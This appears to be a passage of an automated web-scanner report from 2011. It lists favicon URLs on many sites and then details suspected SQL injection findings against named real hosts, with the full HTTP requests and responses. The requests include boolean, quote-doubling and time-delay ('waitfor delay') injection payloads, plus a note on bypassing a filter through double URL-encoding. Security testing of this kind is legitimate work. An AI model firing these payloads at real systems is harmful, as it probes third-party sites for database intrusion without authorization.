27.96. http://www.gourmandia.com/favicon.ico

27.97. http://www.greenwichmeantime.com/favicon.ico

27.98. http://www.harvard.edu/favicon.ico

27.99. http://www.hiexpress.com/favicon.ico

27.100. http://www.holidayinn.com/favicon.ico

27.101. http://www.hollywoodreporter.com/favicon.ico

27.102. http://www.home-remedies-for-you.com/favicon.ico

27.103. http://www.ichotelsgroup.com/favicon.ico

27.104. http://www.imagevenue.com/favicon.ico

27.105. http://www.inc.com/favicon.ico

27.106. http://www.infomash.org/favicon.ico

27.107. http://www.infowars.com/favicon.ico

27.108. http://www.ivillage.com/favicon.ico

27.109. http://www.jango.com/favicon.ico

27.110. http://www.jcwhitney.com/favicon.ico

27.111. http://www.joann.com/favicon.ico

27.112. http://www.jobsonline.net/favicon.ico

27.113. http://www.justia.com/favicon.ico

27.114. http://www.justluxe.com/favicon.ico

27.115. http://www.k12.com/favicon.ico

27.116. http://www.kazaa.com/favicon.ico

27.117. http://www.kcom.com/favicon.ico

27.118. http://www.kcom.com/favicon1.ico

27.119. http://www.kickapps.com/favicon.ico

27.120. http://www.lijit.com/favicon.ico

27.121. http://www.livevideo.com/favicon.ico

27.122. http://www.localpages.com/favicon.ico

27.123. http://www.localschooldirectory.com/favicon.ico

27.124. http://www.lowfares.com/favicon.ico

27.125. http://www.lunka.com/favicon.ico

27.126. http://www.mac.com/favicon.ico

27.127. http://www.maniatv.com/favicon.ico

27.128. http://www.mediaite.com/favicon.ico

27.129. http://www.medicalnewstoday.com/favicon.ico

27.130. http://www.mercurynews.com/favicon.ico

27.131. http://www.michigan.gov/favicon.ico

27.132. http://www.military.com/favicon.ico

27.133. http://www.miniclip.com/favicon.ico

27.134. http://www.mlive.com/favicon.ico

27.135. http://www.mochila.com/favicon.ico

27.136. http://www.music-oasis.com/favicon.ico

27.137. http://www.musiciansfriend.com/favicon.ico

27.138. http://www.myheritage.com/favicon.ico

27.139. http://www.mylifetime.com/favicon.ico

27.140. http://www.mylocalemployment.net/favicon.ico

27.141. http://www.mystart.com/favicon.ico

27.142. http://www.nationalreview.com/favicon.ico

27.143. http://www.netflix.com/favicon.ico

27.144. http://www.newgrounds.com/favicon.ico

27.145. http://www.newsdaily7.com/favicon.ico

27.146. http://www.newsok.com/favicon.ico

27.147. http://www.nextag.com/favicon.ico

27.148. http://www.northerntool.com/favicon.ico

27.149. http://www.oodle.com/favicon.ico

27.150. http://www.opportunity.co/favicon.ico

27.151. http://www.oprah.com/favicon.ico

27.152. http://www.orientaltrading.com/favicon.ico

27.153. http://www.ourstage.com/favicon.ico

27.154. http://www.ovguide.com/favicon.ico

27.155. http://www.partypoker.com/favicon.ico

27.156. http://www.payless.com/favicon.ico

27.157. http://www.pctools.com/favicon.ico

27.158. http://www.phoenix.edu/favicon.ico

27.159. http://www.phoneagentsource.com/favicon.ico

27.160. http://www.pittsburghlive.com/favicon.ico

27.161. http://www.playfin.com/favicon.ico

27.162. http://www.playstation.com/favicon.ico

27.163. http://www.playsushi.com/favicon.ico

27.164. http://www.politico.com/favicon.ico

27.165. http://www.polyvore.com/favicon.ico

27.166. http://www.popsugar.com/favicon.ico

27.167. http://www.poptropica.com/favicon.ico

27.168. http://www.potterybarn.com/favicon.ico

27.169. http://www.prlog.org/favicon.ico

27.170. http://www.pronto.com/favicon.ico

27.171. http://www.qualityhealth.com/favicon.ico

27.172. http://www.radaronline.com/favicon.ico

27.173. http://www.rawtube.com/favicon.ico

27.174. http://www.real.com/favicon.ico

27.175. http://www.rei.com/favicon.ico

27.176. http://www.rollingstone.com/favicon.ico

27.177. http://www.rottentomatoes.com/favicon.ico

27.178. http://www.rushlimbaugh.com/favicon.ico

27.179. http://www.salon.com/favicon.ico

27.180. http://www.samsung.com/favicon.ico

27.181. http://www.shutterfly.com/favicon.ico

27.182. http://www.smarter.com/favicon.ico

27.183. http://www.smugmug.com/favicon.ico

27.184. http://www.songlyrics.com/favicon.ico

27.185. http://www.sony.com/favicon.ico

27.186. http://www.space.com/favicon.ico

27.187. http://www.spanishdict.com/favicon.ico

27.188. http://www.squidoo.com/favicon.ico

27.189. http://www.staples.com/favicon.ico

27.190. http://www.suite101.com/favicon.ico

27.191. http://www.supercheats.com/favicon.ico

27.192. http://www.tagged.com/favicon.ico

27.193. http://www.takkle.com/favicon.ico

27.194. http://www.talkingpointsmemo.com/favicon.ico

27.195. http://www.techsupportforum.com/favicon.ico

27.196. http://www.thedailybeast.com/favicon.ico

27.197. http://www.thefrisky.com/favicon.ico

27.198. http://www.tinypic.com/favicon.ico

27.199. http://www.tomshardware.com/favicon.ico

27.200. http://www.toptenreviews.com/favicon.ico

27.201. http://www.trulia.com/favicon.ico

27.202. http://www.twitlonger.com/favicon.ico

27.203. http://www.umn.edu/favicon.ico

27.204. http://www.ups.com/favicon.ico

27.205. http://www.urbandictionary.com/favicon.ico

27.206. http://www.vast.com/favicon.ico

27.207. http://www.verisign.com/favicon.ico

27.208. http://www.vitals.com/favicon.ico

27.209. http://www.weather.gov/favicon.ico

27.210. http://www.webgains.com/favicon.ico

27.211. http://www.webkinz.com/favicon.ico

27.212. http://www.webring.org/favicon.ico

27.213. http://www.wired.com/favicon.ico

27.214. http://www.wnd.com/favicon.ico

27.215. http://www.woot.com/favicon.ico

27.216. http://www.worldwinner.com/favicon.ico

27.217. http://www.worthpoint.com/favicon.ico

27.218. http://www.wsbtv.com/favicon.ico

27.219. http://www.xomba.com/favicon.ico

27.220. http://www.yfrog.com/favicon.ico

27.221. http://www.yidio.com/favicon.ico

27.222. http://www.yourfilehost.com/favicon.ico

27.223. http://www.yuku.com/favicon.ico

27.224. http://www.zabasearch.com/favicon.ico

27.225. http://www.zmags.com/favicon.ico

28. Content type is not specified

28.1. http://www.4shared.com/favicon.ico

28.2. http://www.6pm.com/favicon.ico

28.3. http://www.bizrate.com/favicon.ico

28.4. http://www.blockbuster.com/favicon.ico

28.5. http://www.boldchat.com/favicon.ico

28.6. http://www.bookrags.com/favicon.ico

28.7. http://www.chacha.com/favicon.ico

28.8. http://www.dailymail.co.uk/favicon.ico

28.9. http://www.dominos.com/favicon.ico

28.10. http://www.gap.com/favicon.ico

28.11. http://www.hi5.com/favicon.ico

28.12. http://www.hotwire.com/favicon.ico

28.13. http://www.instructables.com/favicon.ico

28.14. http://www.jstor.org/favicon.ico

28.15. http://www.medcohealth.com/favicon.ico

28.16. http://www.mynewplace.com/favicon.ico

28.17. http://www.officedepot.com/favicon.ico

28.18. http://www.outbrain.com/favicon.ico

28.19. http://www.pogo.com/favicon.ico

28.20. http://www.retrevo.com/favicon.ico

28.21. http://www.rightathome.com/favicon.ico

28.22. http://www.savings.com/favicon.ico

28.23. http://www.shopzilla.com/favicon.ico

28.24. http://www.techbargains.com/favicon.ico

28.25. http://www.tracfone.com/favicon.ico

28.26. http://www.va.gov/favicon.ico

28.27. http://www.webs.com/favicon.ico

28.28. http://www.zappos.com/favicon.ico

29. SSL certificate



1. SQL injection
There are 12 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The adurl parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the adurl parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:36 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7132

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:22 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/cisco_webex_Together_AllText_728x90_r1.swf";
var gif = "http://s0.2mdn.net/2830766/cisco_webex_Hard-hit_AllText_728x90_r1.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrac
...[SNIP]...

Request 2

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:37 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7144

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jan 31 10:15:05 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.swf";
var gif = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.html%3FTrackID%3D1024051");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.htm
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The shv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the shv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
G1sL2Nyb3NzLXNpdGUtc2NyaXB0aW5nLXhzcy53d3cuY291cmNoZXZlbC5jb20uaHRtbKkCbbz1yg4Luz6oAwHIAxfoA6YD6AMf9QMAAADE&num=3&sig=AGiWqtxUeEkInJc9e-CqdzhYewXj-HfsJw&client=ca-pub-4063878933780912&adurl=http://www.exceptionalski.co.uk" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="www.exceptionalski.co.uk">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4641

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.airtran.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx
Content-Type: text/html; charset=utf-8
Content-Length: 184
Cache-Control: private, max-age=548
Expires: Sat, 02 Apr 2011 14:12:54 GMT
Date: Sat, 02 Apr 2011 14:03:46 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx'>here</a>.</h2>
</body></html>

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=600
Expires: Sat, 02 Apr 2011 14:13:47 GMT
Date: Sat, 02 Apr 2011 14:03:47 GMT
Content-Length: 10394
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...

1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20086 milliseconds to respond to the request, compared with 1023 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bbt.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 - Not Found
content-type: text/html
date: Sat, 02 Apr 2011 13:44:37 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15424
cache-control: private
x-powered-by: ASP.NET
Set-Cookie: AMWEBJCT!%2Fbbt!ASPSESSIONIDAASQCBAD=GLODNHDACIODPHHEBIKBIABD; Path=/
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/
Content-Length: 15564


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404err
...[SNIP]...

1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealtime.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: brc=www.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Set-Cookie: JSESSIONID=805851EED71FF6143D9FA848ECA7CB9A; Path=/
Set-Cookie: session=ts%3D2%5EPVS%3D1; Domain=.dealtime.com; Path=/
Set-Cookie: reloadCheck=%2Ffavicon.ico%26%23039%3Bnull; Domain=.dealtime.com; Path=/
Set-Cookie: perm=countryCode%3Dus; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
